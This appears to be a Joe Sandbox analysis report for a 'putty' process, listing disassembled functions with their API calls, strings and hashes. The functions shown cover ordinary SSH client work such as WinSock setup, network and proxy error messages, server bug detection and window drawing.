                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                            • Instruction ID: d1f3927563bd85d822164bcd1084eab5ef076bc2f6551c05535f5f770a9a800c
                            • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                            • Instruction Fuzzy Hash: E0117DF760304143F6C4867EE9F46B7A796EBC632172D437BC0464B758D22AD841A60C
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 004468F2 Relevance: 129.9, APIs: 37, Strings: 37, Instructions: 388libraryloaderCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcAddress.KERNEL32(?,getaddrinfo), ref: 00446936
                            • GetProcAddress.KERNEL32(75340000,getaddrinfo), ref: 00446947
                            • GetProcAddress.KERNEL32(75340000,freeaddrinfo), ref: 00446965
                            • GetProcAddress.KERNEL32(75340000,getnameinfo), ref: 00446983
                            • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 004469B9
                            • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 004469CF
                            • GetProcAddress.KERNEL32(00000000,getnameinfo), ref: 004469ED
                            • GetProcAddress.KERNEL32(00000000,gai_strerror), ref: 00446A0B
                            • GetProcAddress.KERNEL32(75340000,WSAAddressToStringA), ref: 00446A2F
                            • GetProcAddress.KERNEL32(75340000,WSAAsyncSelect), ref: 00446A4D
                            • GetProcAddress.KERNEL32(75340000,WSAEventSelect), ref: 00446A6B
                            • GetProcAddress.KERNEL32(75340000,select), ref: 00446A89
                            • GetProcAddress.KERNEL32(75340000,WSAGetLastError), ref: 00446AA7
                            • GetProcAddress.KERNEL32(75340000,WSAEnumNetworkEvents), ref: 00446AC5
                            • GetProcAddress.KERNEL32(75340000,WSAStartup), ref: 00446AE3
                            • GetProcAddress.KERNEL32(75340000,WSACleanup), ref: 00446B01
                            • GetProcAddress.KERNEL32(75340000,closesocket), ref: 00446B1F
                            • GetProcAddress.KERNEL32(75340000,ntohl), ref: 00446B3D
                            • GetProcAddress.KERNEL32(75340000,htonl), ref: 00446B5B
                            • GetProcAddress.KERNEL32(75340000,htons), ref: 00446B79
                            • GetProcAddress.KERNEL32(75340000,ntohs), ref: 00446B97
                            • GetProcAddress.KERNEL32(75340000,gethostbyname), ref: 00446BD3
                            • GetProcAddress.KERNEL32(75340000,getservbyname), ref: 00446BF1
                            • GetProcAddress.KERNEL32(75340000,inet_addr), ref: 00446C0F
                            • GetProcAddress.KERNEL32(75340000,inet_ntoa), ref: 00446C2D
                            • GetProcAddress.KERNEL32(75340000,connect), ref: 00446C4B
                            • GetProcAddress.KERNEL32(75340000,bind), ref: 00446C69
                            • GetProcAddress.KERNEL32(75340000,setsockopt), ref: 00446C87
                            • GetProcAddress.KERNEL32(75340000,socket), ref: 00446CA5
                            • GetProcAddress.KERNEL32(75340000,listen), ref: 00446CC3
                            • GetProcAddress.KERNEL32(75340000,send), ref: 00446CE1
                            • GetProcAddress.KERNEL32(75340000,shutdown), ref: 00446CFF
                            • GetProcAddress.KERNEL32(75340000,ioctlsocket), ref: 00446D1D
                            • GetProcAddress.KERNEL32(75340000,accept), ref: 00446D3B
                            • GetProcAddress.KERNEL32(75340000,recv), ref: 00446D59
                            • GetProcAddress.KERNEL32(75340000,WSAIoctl), ref: 00446D77
                              • Part of subcall function 004468BB: WSAStartup.WS2_32(?,004769F0), ref: 004468CC
                            • GetProcAddress.KERNEL32(75340000,gethostname), ref: 00446BB5
                              • Part of subcall function 00441074: MessageBoxA.USER32(00000000,?,00000010), ref: 004410AD
                              • Part of subcall function 00441074: MessageBoxA.USER32(00000000,?,00001010), ref: 004410FE
                              • Part of subcall function 00441074: IsZoomed.USER32 ref: 0044111F
                              • Part of subcall function 00441074: GetWindowLongA.USER32(000000F0,00000000), ref: 00441156
                              • Part of subcall function 00441074: SetWindowLongA.USER32(000000F0,00000000), ref: 0044118E
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: AddressProc$LongMessageWindow$StartupZoomed
                            • String ID: Unable to initialise WinSock$Unable to load any WinSock library$WSAAddressToStringA$WSAAsyncSelect$WSACleanup$WSAEnumNetworkEvents$WSAEventSelect$WSAGetLastError$WSAIoctl$WSAStartup$accept$bind$closesocket$connect$freeaddrinfo$gai_strerror$getaddrinfo$gethostbyname$gethostname$getnameinfo$getservbyname$htonl$htons$inet_addr$inet_ntoa$ioctlsocket$listen$ntohl$ntohs$recv$select$send$setsockopt$shutdown$socket$wship6.dll$wsock32.dll
                            • API String ID: 2174033337-3986585476
                            • Opcode ID: ec28c4c4fc4855fc888beca18ff46f43a2c0ecdcf740dd598c90a0fc7d492ad2
                            • Instruction ID: a6785391484e933862044740171b58c88fdbd980a089bdef6c7874fce9c2ab35
                            • Opcode Fuzzy Hash: ec28c4c4fc4855fc888beca18ff46f43a2c0ecdcf740dd598c90a0fc7d492ad2
                            • Instruction Fuzzy Hash: D8D1EBF1A48691DFE754DF68ACD5A253BE8B306704362043BE14DE3261D77C98848F5E
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00446E5E Relevance: 75.4, APIs: 6, Strings: 37, Instructions: 175windowCOMMON
                            Download Yara Rule
                            APIs
                            • _strcat.LIBCMT ref: 0044704A
                            • _strlen.LIBCMT ref: 00447052
                            • FormatMessageA.KERNEL32(00001200,00000000,00000000,00000400,?,0001000F,00000000,?,?,?,?,?,?,00000000,?,00000000), ref: 00447076
                            • GetLastError.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,00000000,00448076,00000000,00000000,00000000,?,0043DB69), ref: 00447080
                            • _strlen.LIBCMT ref: 004470A2
                            • _strlen.LIBCMT ref: 004470C0
                            Strings
                            • Network error: Permission denied, xrefs: 00446E91
                            • Network error: Protocol not supported, xrefs: 00446FA9
                            • Network error: No buffer space available, xrefs: 00446F63
                            • Network error: Operation already in progress, xrefs: 00446EB9
                            • Network error: Network is down, xrefs: 00446F45
                            • Network error: Interrupted function call, xrefs: 00446F13
                            • Windows error code %d (and FormatMessage returned %d), xrefs: 0044708F
                            • Network error: Cannot send after socket shutdown, xrefs: 00446FBD
                            • Network error: Cannot assign requested address, xrefs: 00446EA5
                            • Network error: Network is unreachable, xrefs: 00446F59
                            • Network error: Software caused connection abort, xrefs: 00446EC3
                            • Network error: Connection timed out, xrefs: 00446FD1
                            • Network error: Destination address required, xrefs: 00446EE1
                            • Network error: Address family not supported by protocol family, xrefs: 00446EAF
                            • Network error: No route to host, xrefs: 00446EFF
                            • Network error: Protocol family not supported, xrefs: 00446F95
                            • Network error: Invalid argument, xrefs: 00446F1D
                            • Network error: Network dropped connection on reset, xrefs: 00446F4F
                            • Network error: Socket type not supported, xrefs: 00446FC7
                            • Network error: Connection reset by peer, xrefs: 00446ED7
                            • Network error: Operation now in progress, xrefs: 00446F09
                            • Network error: Too many processes, xrefs: 00446F9F
                            • Network error: Bad address, xrefs: 00446EEB
                            • Network error: Host is down, xrefs: 00446EF5
                            • Network error: , xrefs: 00446E69
                            • Network error: Socket is not connected, xrefs: 00446F77
                            • Network error: Resource temporarily unavailable, xrefs: 00446FDB
                            • Network error: Socket is already connected, xrefs: 00446F27
                            • Network error: Protocol wrong type for socket, xrefs: 00446FB3
                            • Network error: Connection refused, xrefs: 00446ECD
                            • Network error: Address already in use, xrefs: 00446E9B
                            • Network error: Operation not supported, xrefs: 00446F8B
                            • Network error: Message too long, xrefs: 00446F3B
                            • Network error: Too many open files, xrefs: 00446F31
                            • Network error: Socket operation on non-socket, xrefs: 00446F81
                            • Network error: Graceful shutdown in progress, xrefs: 00446FE5
                            • Network error: Bad protocol option, xrefs: 00446F6D
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strlen$ErrorFormatLastMessage_strcat
                            • String ID: Network error: $Network error: Address already in use$Network error: Address family not supported by protocol family$Network error: Bad address$Network error: Bad protocol option$Network error: Cannot assign requested address$Network error: Cannot send after socket shutdown$Network error: Connection refused$Network error: Connection reset by peer$Network error: Connection timed out$Network error: Destination address required$Network error: Graceful shutdown in progress$Network error: Host is down$Network error: Interrupted function call$Network error: Invalid argument$Network error: Message too long$Network error: Network dropped connection on reset$Network error: Network is down$Network error: Network is unreachable$Network error: No buffer space available$Network error: No route to host$Network error: Operation already in progress$Network error: Operation not supported$Network error: Operation now in progress$Network error: Permission denied$Network error: Protocol family not supported$Network error: Protocol not supported$Network error: Protocol wrong type for socket$Network error: Resource temporarily unavailable$Network error: Socket is already connected$Network error: Socket is not connected$Network error: Socket operation on non-socket$Network error: Socket type not supported$Network error: Software caused connection abort$Network error: Too many open files$Network error: Too many processes$Windows error code %d (and FormatMessage returned %d)
                            • API String ID: 4013000384-487510915
                            • Opcode ID: 3c316481ca994727aa0498853219e1374a61e929664c8b078f28b747429622dc
                            • Instruction ID: 64bfcea645b41ce40b399cece31816e7328067ab4295704862905616a6f3ef5b
                            • Opcode Fuzzy Hash: 3c316481ca994727aa0498853219e1374a61e929664c8b078f28b747429622dc
                            • Instruction Fuzzy Hash: A6516971B0E2009BF7205A58AA81E7666A5DB15704B20C53BB986CB281F36EDC43E75F
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0041242E Relevance: 70.5, APIs: 2, Strings: 38, Instructions: 463COMMON
                            Download Yara Rule
                            APIs
                            • _strcspn.LIBCMT ref: 0041243B
                            • _strcspn.LIBCMT ref: 00412451
                              • Part of subcall function 0043D0E9: _wctomb_s.LIBCMT ref: 0043D14E
                              • Part of subcall function 0043D0E9: _strlen.LIBCMT ref: 0043D15B
                              • Part of subcall function 0043D0E9: _strlen.LIBCMT ref: 0043D166
                              • Part of subcall function 0043D0E9: _strcat.LIBCMT ref: 0043D18B
                              • Part of subcall function 0043D0E9: SendDlgItemMessageA.USER32(00000000,000003E9,00000180,00000000,00000000), ref: 0043D1D5
                              • Part of subcall function 0043D0E9: SendDlgItemMessageA.USER32(000003E9,0000018B,00000000,00000000), ref: 0043D1E7
                              • Part of subcall function 0043D0E9: SendDlgItemMessageA.USER32(000003E9,00000197,-00000001,00000000), ref: 0043D1F9
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: ItemMessageSend$_strcspn_strlen$_strcat_wctomb_s
                            • String ID: * VShell$1.2.18$1.2.19$1.2.20$1.2.21$1.2.22$1.36 sshlib: GlobalScape$1.36_sshlib GlobalSCAPE$2.0.*$2.0.0*$2.0.10*$2.1 *$2.1.0*$2.2.0*$2.3.0*$Cisco-1.25$DigiSSH_2.0$OSU_1.4alpha3$OSU_1.5alpha4$OpenSSH_2.5.[0-3]*$OpenSSH_2.[0-2]*$OpenSSH_2.[0-4]*$OpenSSH_2.[5-9]*$OpenSSH_3.[0-2]*$Sun_SSH_1.0$Sun_SSH_1.0.1$We believe remote version can't handle SSH-1 RSA authentication$We believe remote version has SSH-1 ignore bug$We believe remote version has SSH-2 HMAC bug$We believe remote version has SSH-2 RSA padding bug$We believe remote version has SSH-2 ignore bug$We believe remote version has SSH-2 key-derivation bug$We believe remote version has SSH-2 public-key-session-ID bug$We believe remote version has SSH-2 rekey bug$We believe remote version has winadj bug$We believe remote version ignores SSH-2 maximum packet size$We believe remote version needs a plain SSH-1 password$WeOnlyDo-*
                            • API String ID: 3474295531-378046228
                            • Opcode ID: bd83cd5ba841beace80e55e09fcaa28893ab71604ac1b3c24a4efa51ae504a35
                            • Instruction ID: 8ed8046d5d91a07ae7258d775d29bda47397ed54fa8b829cb2f1d498c6077f0a
                            • Opcode Fuzzy Hash: bd83cd5ba841beace80e55e09fcaa28893ab71604ac1b3c24a4efa51ae504a35
                            • Instruction Fuzzy Hash: DFC13C3214D3413EFA292672BE97FAB67D9DB45729F20142FF941E01D2FEAEA850401D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0044C558 Relevance: 49.3, APIs: 17, Strings: 11, Instructions: 308COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Strings
                            • For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts, xrefs: 0044C87A
                            • File: , xrefs: 0044C656
                            • (Press Retry to debug the application - JIT must be enabled), xrefs: 0044C89D
                            • Microsoft Visual C++ Runtime Library, xrefs: 0044C8B3
                            • Assertion failed: %s, file %s, line %d, xrefs: 0044C914
                            • Line: , xrefs: 0044C7A5
                            • Assertion failed!, xrefs: 0044C592
                            • ..\conf.c, xrefs: 0044C630
                            • Expression: , xrefs: 0044C7EA
                            • <program name unknown>, xrefs: 0044C5E6
                            • Program: , xrefs: 0044C5B5
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: _strlen$_strcat_strncat$FileModuleName_strncpy
                            • String ID: (Press Retry to debug the application - JIT must be enabled)$..\conf.c$<program name unknown>$Assertion failed!$Assertion failed: %s, file %s, line %d$Expression: $File: $For information on how your program can cause an assertionfailure, see the Visual C++ documentation on asserts$Line: $Microsoft Visual C++ Runtime Library$Program:
                            • API String ID: 518805579-843566327
                            • Opcode ID: 2eb2e6109f33a04c226582c9ae94043ef1aac793a6b714aa2df42a05d35ee133
                            • Instruction ID: 4527ec651a9889ef48e962ac0c916fc4ebf80cd094c52819e1deec2671ab16c5
                            • Opcode Fuzzy Hash: 2eb2e6109f33a04c226582c9ae94043ef1aac793a6b714aa2df42a05d35ee133
                            • Instruction Fuzzy Hash: F3A19C71D002197AEF21BBE1ECC5EAE73ACBB04308F1404ABF505E3152D639D6889B5D
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0043DF14 Relevance: 46.9, APIs: 31, Instructions: 368windowCOMMON
                            Download Yara Rule
                            APIs
                            • GetDC.USER32 ref: 0043DF9F
                            • GetDeviceCaps.GDI32(?,0000005A), ref: 0043DFC2
                            • MulDiv.KERNEL32(00000000), ref: 0043DFCF
                            • CreateFontA.GDI32(00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000,?,00000001,00000000), ref: 0043E038
                            • SelectObject.GDI32(?,00000000), ref: 0043E043
                            • GetTextMetricsA.GDI32(?,?), ref: 0043E050
                            • GetObjectA.GDI32(0000003C,00474C60), ref: 0043E063
                            • GetOEMCP.KERNEL32 ref: 0043E0D3
                            • TranslateCharsetInfo.GDI32(000000FF,?,00000001), ref: 0043E0E4
                            • GetCPInfo.KERNEL32(00000000,?), ref: 0043E100
                            • CreateFontA.GDI32(00000000,00000000,?,00000000,00000001,00000000,?,00000000,00000000,?,00000001,00000000), ref: 0043E154
                            • CreateCompatibleDC.GDI32(?), ref: 0043E15E
                            • CreateCompatibleBitmap.GDI32(?), ref: 0043E175
                            • SelectObject.GDI32(00000000,00000000), ref: 0043E180
                            • SelectObject.GDI32(00000000), ref: 0043E190
                            • SetTextAlign.GDI32(00000000,00000000), ref: 0043E198
                            • SetTextColor.GDI32(00000000,00FFFFFF), ref: 0043E1A4
                            • SetBkColor.GDI32(00000000,00000000), ref: 0043E1AC
                            • SetBkMode.GDI32(00000000,00000002), ref: 0043E1B5
                            • ExtTextOutA.GDI32(00000000,00000000,00000000,00000002,00000000,0046BA20,00000001,00000000), ref: 0043E1C9
                            • GetPixel.GDI32(00000000,?,000000FF), ref: 0043E1EC
                            • SelectObject.GDI32(00000000,?), ref: 0043E20F
                            • DeleteObject.GDI32(?), ref: 0043E218
                            • DeleteDC.GDI32(00000000), ref: 0043E21F
                            • DeleteObject.GDI32 ref: 0043E236
                            • CreateFontA.GDI32(00000000,00000000,?,00000000,00000000,00000000,?,00000000,00000000,?,00000001,00000000), ref: 0043E28A
                            • SelectObject.GDI32(?,00000000), ref: 0043E2C1
                            • GetTextMetricsA.GDI32(?,?), ref: 0043E2D2
                            • ReleaseDC.USER32(?), ref: 0043E30C
                            • DeleteObject.GDI32 ref: 0043E326
                            • DeleteObject.GDI32 ref: 0043E34F
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Object$CreateDeleteSelectText$Font$ColorCompatibleInfoMetrics$AlignBitmapCapsCharsetDeviceModePixelReleaseTranslate
                            • String ID:
                            • API String ID: 2935192848-0
                            • Opcode ID: e0d559aea080160600912080f37a1959aa2a67ad54928d334d5699faafeb1b44
                            • Instruction ID: 5933931f3f294e87d1727512b3c925d3e2fabde184893f35575f437d716fb038
                            • Opcode Fuzzy Hash: e0d559aea080160600912080f37a1959aa2a67ad54928d334d5699faafeb1b44
                            • Instruction Fuzzy Hash: 7DD1AD71505314EFDB218F62EC89AAB3FA9FB08751F10453AF919C62A1CB74C891CF98
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 0040CD75 Relevance: 45.9, APIs: 5, Strings: 21, Instructions: 425COMMON
                            Download Yara Rule
                            Strings
                            • Connection refused, xrefs: 0040D0CF
                            • Network unreachable, xrefs: 0040D0C1
                            • Proxy error: SOCKS proxy did not accept our authentication, xrefs: 0040CF1D
                            • Proxy error: Server chose username/password authentication but we didn't offer it!, xrefs: 0040D1D1
                            • TTL expired, xrefs: 0040D0D6
                            • Proxy error: SOCKS proxy returned unexpected version, xrefs: 0040CE95
                            • Proxy error: We don't support GSSAPI authentication, xrefs: 0040D18E
                            • Connection not allowed by ruleset, xrefs: 0040D0BA
                            • General SOCKS server failure, xrefs: 0040D0B3
                            • Address type not supported, xrefs: 0040D0E4
                            • Proxy error: Unexpected proxy error, xrefs: 0040D288
                            • Proxy error: SOCKS proxy returned wrong version number, xrefs: 0040D079
                            • Host unreachable, xrefs: 0040D0C8
                            • Proxy error: SOCKS password subnegotiation contained wrong version number, xrefs: 0040CF0C
                            • ..\proxy.c, xrefs: 0040CFAD
                            • type == ADDRTYPE_NAME, xrefs: 0040CFB2
                            • Unrecognised SOCKS error code %d, xrefs: 0040D100
                            • Proxy error: , xrefs: 0040D093
                            • Proxy error: SOCKS proxy returned unrecognised address format, xrefs: 0040D144
                            • Proxy error: SOCKS proxy refused password authentication, xrefs: 0040CF34
                            • Command not supported, xrefs: 0040D0DD
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID:
                            • String ID: ..\proxy.c$Address type not supported$Command not supported$Connection not allowed by ruleset$Connection refused$General SOCKS server failure$Host unreachable$Network unreachable$Proxy error: $Proxy error: SOCKS password subnegotiation contained wrong version number$Proxy error: SOCKS proxy did not accept our authentication$Proxy error: SOCKS proxy refused password authentication$Proxy error: SOCKS proxy returned unexpected version$Proxy error: SOCKS proxy returned unrecognised address format$Proxy error: SOCKS proxy returned wrong version number$Proxy error: Server chose username/password authentication but we didn't offer it!$Proxy error: Unexpected proxy error$Proxy error: We don't support GSSAPI authentication$TTL expired$Unrecognised SOCKS error code %d$type == ADDRTYPE_NAME
                            • API String ID: 0-3639339871
                            • Opcode ID: 016d38c4467efdd1764e6ecb26e4f0bb24677e77b5fa8c10c7cff475f0920d5c
                            • Instruction ID: 69e2ab597c61ee383b426aa36e28e967c6898aa5afca5646317ee10f0c80ccdf
                            • Opcode Fuzzy Hash: 016d38c4467efdd1764e6ecb26e4f0bb24677e77b5fa8c10c7cff475f0920d5c
                            • Instruction Fuzzy Hash: F6E10970D04304EADB319BA0CC85BAB77A4AF01704F2444BFF946BA2C2D67DD5898B5E
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00410EB3 Relevance: 37.6, APIs: 25, Instructions: 149COMMON
                            Download Yara Rule
                            APIs
                            • BeginPaint.USER32(?,?), ref: 00410EFB
                            • SelectObject.GDI32(00000000), ref: 00410F10
                            • GetStockObject.GDI32(00000007), ref: 00410F14
                            • SelectObject.GDI32(00000000,00000000), ref: 00410F1C
                            • CreateSolidBrush.GDI32 ref: 00410F24
                            • SelectObject.GDI32(00000000,00000000), ref: 00410F2F
                            • GetClientRect.USER32(?,?), ref: 00410F39
                            • Rectangle.GDI32(00000000,?,?,?,?), ref: 00410F4C
                            • GetWindowTextLengthA.USER32(?), ref: 00410F53
                            • GetWindowTextA.USER32(?,?,?), ref: 00410F73
                            • SetTextColor.GDI32(00000000), ref: 00410F80
                            • SetBkColor.GDI32(00000000), ref: 00410F8D
                            • TextOutA.GDI32(00000000,?,?,?,?), ref: 00410FA8
                            • SelectObject.GDI32(00000000,?), ref: 00410FBB
                            • DeleteObject.GDI32(?), ref: 00410FC0
                            • EndPaint.USER32(?,?), ref: 00410FCB
                            • CreateCompatibleDC.GDI32(00000000), ref: 00410FDC
                            • SelectObject.GDI32(00000000), ref: 00410FEB
                            • _strlen.LIBCMT ref: 00410FF8
                            • GetTextExtentPoint32A.GDI32(00000000,?,00000000,?), ref: 00411003
                            • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000016), ref: 0041101F
                            • InvalidateRect.USER32(?,00000000,00000000), ref: 0041102A
                            • DeleteDC.GDI32(00000000), ref: 00411031
                            • DeleteObject.GDI32 ref: 0041103F
                            • DefWindowProcA.USER32(?,?,?,?), ref: 00411058
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: Object$SelectText$Window$Delete$ColorCreatePaintRect$BeginBrushClientCompatibleExtentInvalidateLengthPoint32ProcRectangleSolidStock_strlen
                            • String ID:
                            • API String ID: 2408264671-0
                            • Opcode ID: e305e72a266b91ab72d18c4f3fa9b5ead44b9e1ac33aac232e4525f7ffba0c9c
                            • Instruction ID: 6abfda51203b32e14dd2b3034279d45f381161c426946cc792a4a68efd743803
                            • Opcode Fuzzy Hash: e305e72a266b91ab72d18c4f3fa9b5ead44b9e1ac33aac232e4525f7ffba0c9c
                            • Instruction Fuzzy Hash: 77411776404208BFDB129FA4ED48DBF7FB9FB09762B004425FA06D1172C73589A1EB69
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 00449177 Relevance: 33.4, APIs: 3, Strings: 16, Instructions: 175timeCOMMON
                            Download Yara Rule
                            APIs
                            • GetCommState.KERNEL32(?,?), ref: 00449188
                              • Part of subcall function 0043D0E9: _wctomb_s.LIBCMT ref: 0043D14E
                              • Part of subcall function 0043D0E9: _strlen.LIBCMT ref: 0043D15B
                              • Part of subcall function 0043D0E9: _strlen.LIBCMT ref: 0043D166
                              • Part of subcall function 0043D0E9: _strcat.LIBCMT ref: 0043D18B
                              • Part of subcall function 0043D0E9: SendDlgItemMessageA.USER32(00000000,000003E9,00000180,00000000,00000000), ref: 0043D1D5
                              • Part of subcall function 0043D0E9: SendDlgItemMessageA.USER32(000003E9,0000018B,00000000,00000000), ref: 0043D1E7
                              • Part of subcall function 0043D0E9: SendDlgItemMessageA.USER32(000003E9,00000197,-00000001,00000000), ref: 0043D1F9
                            • SetCommState.KERNEL32(?,?), ref: 0044933E
                            • SetCommTimeouts.KERNEL32(?,?), ref: 00449369
                            Strings
                            Memory Dump Source
                            • Source File: 0000000A.00000002.2599570137.0000000000401000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                            • Associated: 0000000A.00000002.2599553463.0000000000400000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599617835.0000000000457000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000473000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599653686.0000000000476000.00000004.00000001.01000000.0000000B.sdmpDownload File
                            • Associated: 0000000A.00000002.2599702333.0000000000479000.00000002.00000001.01000000.0000000B.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_10_2_400000_putty.jbxd
                            Similarity
                            • API ID: CommItemMessageSend$State_strlen$Timeouts_strcat_wctomb_s
